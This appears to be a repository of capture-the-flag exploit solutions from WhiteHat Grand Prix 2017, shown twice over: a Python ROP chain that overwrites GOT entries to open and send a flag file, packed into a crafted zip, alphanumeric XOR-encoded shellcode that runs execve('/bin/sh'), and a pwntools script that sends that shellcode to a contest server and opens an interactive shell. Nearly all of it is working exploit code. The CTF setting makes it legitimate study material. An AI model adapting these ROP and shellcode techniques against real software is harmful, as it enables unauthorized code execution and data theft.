cubarco/1_WhiteHat_Grand_Prix_2017_exps

## 1_WhiteHat_Grand_Prix_2017_exps
Shellcode_revenge++, Hellozip

## hellozip_exp.py
#!/usr/bin/env python
# coding=utf8

from pwn import p32, p16


pop_2 = 0x8048F9A
pop_1 = 0x8048F9B

add_ptrebp_bl = 0x080488ac
pop_ebp = 0x08048898
pop_ebx = 0x080484a1
ret = 0x8048B87
readable_addr = ret

add_eax_ptrebx = 0x080492bb

string_buf = 0x804B064

write_plt = 0x8048550
write_got = 0x804B030

rop_chain = (
    # I wrote a execve version of exp, but it *dropped EGID* in the server
    # whatever command it executed. Although it worked fine in my local
    # machine. I don't know why, it's really werid.

    # So I tried to do all the open-read-write stuffs in one ROP-chain.
    # The main goal is to open('flag', 0) and sendfile(1, 3, 0, 100)


    p32(pop_1) + p32(readable_addr) +  # pop some corrupted stack

    # craft open() on write_got
    # I could just find the gadget to ADD byte by byte. It's add_ptrebp_bl, go
    # check about that.
    p32(pop_ebx) + p32(0x80) +
    p32(pop_ebp) + p32(write_got + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(0xfc) +
    p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
    p32(add_ptrebp_bl) +

    # prepare 'flag' string
    p32(pop_ebx) + p32(ord('f')) +
    p32(pop_ebp) + p32(string_buf + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('l')) +
    p32(pop_ebp) + p32(string_buf + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('a')) +
    p32(pop_ebp) + p32(string_buf + 2 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('g')) +
    p32(pop_ebp) + p32(string_buf + 3 + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(ord('\x00')) +
    p32(pop_ebp) + p32(string_buf + 4 + 0x3d) +
    p32(add_ptrebp_bl) +

    # now open('flag', 0), and the returned file descriptor should be 3
    p32(write_plt) + p32(pop_2) + p32(string_buf) + p32(0) +

    # craft sendfile() on write_got. FYI, it's open() in write_got now.
    p32(pop_ebx) + p32(0x50) +
    p32(pop_ebp) + p32(write_got + 0x3d) +
    p32(add_ptrebp_bl) +
    p32(pop_ebx) + p32(0x7b) +
    p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
    p32(add_ptrebp_bl) +
    # maybe a carry bit will be triggered in previous operation, about
    # 50% possibility. It's okay to ignore that.

    # finally sendfile(1, 3, 0, 100)
    p32(write_plt) + p32(0xdeadbeef) + p32(1) + p32(3) + p32(0) + p32(100)
)

payload = '\x00' * 276 + rop_chain

# Create template.zip with:
# with ZipFile('template.zip', 'w') as f:
#     f.write('emptyfile', 'a')
template_zip_buf = '504b0304140000000000517a904b0000000000000000000000000100000061504b01021403140000000000517a904b000000000000000000000000010000000000000000000000a4810000000061504b050600000000010001002f0000001f0000000000'.decode('hex')

expzip_buf = \
    template_zip_buf[:0x3b] + \
    p16(len(payload)) + \
    template_zip_buf[0x3d:0x4d] + \
    payload + \
    template_zip_buf[0x4e:]

with open('exp.zip', 'w') as f:
    f.write(expzip_buf)

# Now scp exp.zip to the /tmp dir in server,
# and run 'cd /home/hellozip; ./hellozip < /tmp/exp.zip'

## shellcode_revenge_binsh.s
# Slightly modified from: https://www.exploit-db.com/exploits/35205/
# Assembled (56 bytes):
# h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as binsh.s -o binsh.o ; strings binsh.o
.section .data
.section .text
.globl _start

_start:
  push $0x2f2f412f
  pop %rax
  xor $0x2f4f5150, %rax     # RAX becomes 0x60107f. it's close to the buffer of 'name'. use it as the base of shellcode
  push %rax
  pop %rsi                  # Make use of '^', AKA pop %rsi

prepare_key:                # "hj5XVX"
  # put the xor key into %eax
  push $0x5658356a          # 'hj5XV' pushed backwards because x86 stack.
  pop %rax                  # 'X'

decode_encoded_code:        # "1FK"
  #xor %eax, 0x4b(%rsi)      # '1FK'  encoded_code       ; pops & syscall decoded
  xor %eax, 0x6d(%rsi)      # '1FK'  encoded_code       ; pops & syscall decoded

decode_encoded_data:        # "1FSH3FO"
  xor %eax, 0x75(%rsi)      # '1FS'  encoded_data + 4  ; "/sh\0" decoded
  xor 0x71(%rsi), %rax      # 'H3FO' encoded_data      ; "/bin/sh\0" now in %rax

begin_stack_setup:          # "PT"
  push %rax                 # 'P' push "/bin/sh\0"
  push %rsp                 # 'T' push pointer to /bin/sh


zero_rax:                   # "j0X40"
  # xor %rax, %rax
  push $0x30                # 'j0'
  pop %rax                  # 'X'
  xor $0x30, %al            # '40' %rax is NULL

end_stack_setup:            # "PP"
  push %rax                 # 'P' push NULL
  push %rax                 # 'P' push NULL


mov_3b_al:                  # "4u4N"
  # mov $0x3b, %al
  xor $0x75, %al            # '4u'
  xor $0x4e, %al            # '4N' %al = 0x4e xor 0x75 =  $0x3b
                            #            this is for syscall ^
begin_stack_run:            # "Z"
  pop %rdx                  # 'Z' mov $0x00, %rdx ; %rdx = NULL


encoded_code:               # "4jWS"
                            #  0x34 0x6a 0x57 0x53
                            # AFTER XOR MAGIC:
  .byte 0x34                # "\x5e" pop %rsi     ; %rsi = NULL
  .byte 0x6a                # "\x5f" pop %rdi     ; %rdi = pointer to "/bin/sh\0"
  .byte 0x57                # "\x0f"
  .byte 0x53                # "\x05" syscall      ; execve("/bin/sh\0",NULL,NULL);

  # syscall(%rax) = function(%rdi,%rsi,%rdx);
  # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);


encoded_data:               # "EW18EF0V" turns into "/bin/sh\0"
                            # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
                            # AFTER XOR MAGIC:
  .byte 0x45                #  /
  .byte 0x57                #  b
  .byte 0x31                #  i
  .byte 0x38                #  n
  .byte 0x45                #  /
  .byte 0x46                #  s
  .byte 0x30                #  h
  .byte 0x56                #  \0

## shellcode_revenge_exp.py
#!/usr/bin/env python
# coding=utf8

from pwn import remote, process, p64, asm

# p = process('./shellcode_revenge++')
p = remote('shellcode-revenge.grandprix.whitehatvn.com', 10203)

shellcode = 'h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V'
shellcode = shellcode.ljust(80, 'G')  # append nop
print shellcode

name_buf = 0x6010C0
payload = 'a' * 24 + p64(name_buf)
p.recvuntil('What\'s your name,')
p.send(shellcode)

p.recvuntil('messege for me!')
p.sendline(payload)

p.interactive()
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p32, p16


	pop_2 = 0x8048F9A
	pop_1 = 0x8048F9B

	add_ptrebp_bl = 0x080488ac
	pop_ebp = 0x08048898
	pop_ebx = 0x080484a1
	ret = 0x8048B87
	readable_addr = ret

	add_eax_ptrebx = 0x080492bb

	string_buf = 0x804B064

	write_plt = 0x8048550
	write_got = 0x804B030

	rop_chain = (
	# I wrote a execve version of exp, but it dropped EGID in the server
	# whatever command it executed. Although it worked fine in my local
	# machine. I don't know why, it's really werid.

	# So I tried to do all the open-read-write stuffs in one ROP-chain.
	# The main goal is to open('flag', 0) and sendfile(1, 3, 0, 100)


	p32(pop_1) + p32(readable_addr) + # pop some corrupted stack

	# craft open() on write_got
	# I could just find the gadget to ADD byte by byte. It's add_ptrebp_bl, go
	# check about that.
	p32(pop_ebx) + p32(0x80) +
	p32(pop_ebp) + p32(write_got + 0x3d) +
	p32(add_ptrebp_bl) +
	p32(pop_ebx) + p32(0xfc) +
	p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
	p32(add_ptrebp_bl) +

	# prepare 'flag' string
	p32(pop_ebx) + p32(ord('f')) +
	p32(pop_ebp) + p32(string_buf + 0x3d) +
	p32(add_ptrebp_bl) +
	p32(pop_ebx) + p32(ord('l')) +
	p32(pop_ebp) + p32(string_buf + 1 + 0x3d) +
	p32(add_ptrebp_bl) +
	p32(pop_ebx) + p32(ord('a')) +
	p32(pop_ebp) + p32(string_buf + 2 + 0x3d) +
	p32(add_ptrebp_bl) +
	p32(pop_ebx) + p32(ord('g')) +
	p32(pop_ebp) + p32(string_buf + 3 + 0x3d) +
	p32(add_ptrebp_bl) +
	p32(pop_ebx) + p32(ord('\x00')) +
	p32(pop_ebp) + p32(string_buf + 4 + 0x3d) +
	p32(add_ptrebp_bl) +

	# now open('flag', 0), and the returned file descriptor should be 3
	p32(write_plt) + p32(pop_2) + p32(string_buf) + p32(0) +

	# craft sendfile() on write_got. FYI, it's open() in write_got now.
	p32(pop_ebx) + p32(0x50) +
	p32(pop_ebp) + p32(write_got + 0x3d) +
	p32(add_ptrebp_bl) +
	p32(pop_ebx) + p32(0x7b) +
	p32(pop_ebp) + p32(write_got + 1 + 0x3d) +
	p32(add_ptrebp_bl) +
	# maybe a carry bit will be triggered in previous operation, about
	# 50% possibility. It's okay to ignore that.

	# finally sendfile(1, 3, 0, 100)
	p32(write_plt) + p32(0xdeadbeef) + p32(1) + p32(3) + p32(0) + p32(100)
	)

	payload = '\x00' * 276 + rop_chain

	# Create template.zip with:
	# with ZipFile('template.zip', 'w') as f:
	# f.write('emptyfile', 'a')
	template_zip_buf = '504b0304140000000000517a904b0000000000000000000000000100000061504b01021403140000000000517a904b000000000000000000000000010000000000000000000000a4810000000061504b050600000000010001002f0000001f0000000000'.decode('hex')

	expzip_buf = \
	template_zip_buf[:0x3b] + \
	p16(len(payload)) + \
	template_zip_buf[0x3d:0x4d] + \
	payload + \
	template_zip_buf[0x4e:]

	with open('exp.zip', 'w') as f:
	f.write(expzip_buf)

	# Now scp exp.zip to the /tmp dir in server,
	# and run 'cd /home/hellozip; ./hellozip < /tmp/exp.zip'
	# Slightly modified from: https://www.exploit-db.com/exploits/35205/
	# Assembled (56 bytes):
	# h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V
	#
	# Assembly:
	# user@host $ as binsh.s -o binsh.o ; strings binsh.o
	.section .data
	.section .text
	.globl _start

	_start:
	push $0x2f2f412f
	pop %rax
	xor $0x2f4f5150, %rax # RAX becomes 0x60107f. it's close to the buffer of 'name'. use it as the base of shellcode
	push %rax
	pop %rsi # Make use of '^', AKA pop %rsi

	prepare_key: # "hj5XVX"
	# put the xor key into %eax
	push $0x5658356a # 'hj5XV' pushed backwards because x86 stack.
	pop %rax # 'X'

	decode_encoded_code: # "1FK"
	#xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded
	xor %eax, 0x6d(%rsi) # '1FK' encoded_code ; pops & syscall decoded

	decode_encoded_data: # "1FSH3FO"
	xor %eax, 0x75(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded
	xor 0x71(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax

	begin_stack_setup: # "PT"
	push %rax # 'P' push "/bin/sh\0"
	push %rsp # 'T' push pointer to /bin/sh


	zero_rax: # "j0X40"
	# xor %rax, %rax
	push $0x30 # 'j0'
	pop %rax # 'X'
	xor $0x30, %al # '40' %rax is NULL

	end_stack_setup: # "PP"
	push %rax # 'P' push NULL
	push %rax # 'P' push NULL


	mov_3b_al: # "4u4N"
	# mov $0x3b, %al
	xor $0x75, %al # '4u'
	xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b
	# this is for syscall ^
	begin_stack_run: # "Z"
	pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL


	encoded_code: # "4jWS"
	# 0x34 0x6a 0x57 0x53
	# AFTER XOR MAGIC:
	.byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL
	.byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
	.byte 0x57 # "\x0f"
	.byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);

	# syscall(%rax) = function(%rdi,%rsi,%rdx);
	# syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);


	encoded_data: # "EW18EF0V" turns into "/bin/sh\0"
	# 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
	# AFTER XOR MAGIC:
	.byte 0x45 # /
	.byte 0x57 # b
	.byte 0x31 # i
	.byte 0x38 # n
	.byte 0x45 # /
	.byte 0x46 # s
	.byte 0x30 # h
	.byte 0x56 # \0
	#!/usr/bin/env python
	# coding=utf8

	from pwn import remote, process, p64, asm

	# p = process('./shellcode_revenge++')
	p = remote('shellcode-revenge.grandprix.whitehatvn.com', 10203)

	shellcode = 'h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V'
	shellcode = shellcode.ljust(80, 'G') # append nop
	print shellcode

	name_buf = 0x6010C0
	payload = 'a' * 24 + p64(name_buf)
	p.recvuntil('What\'s your name,')
	p.send(shellcode)

	p.recvuntil('messege for me!')
	p.sendline(payload)

	p.interactive()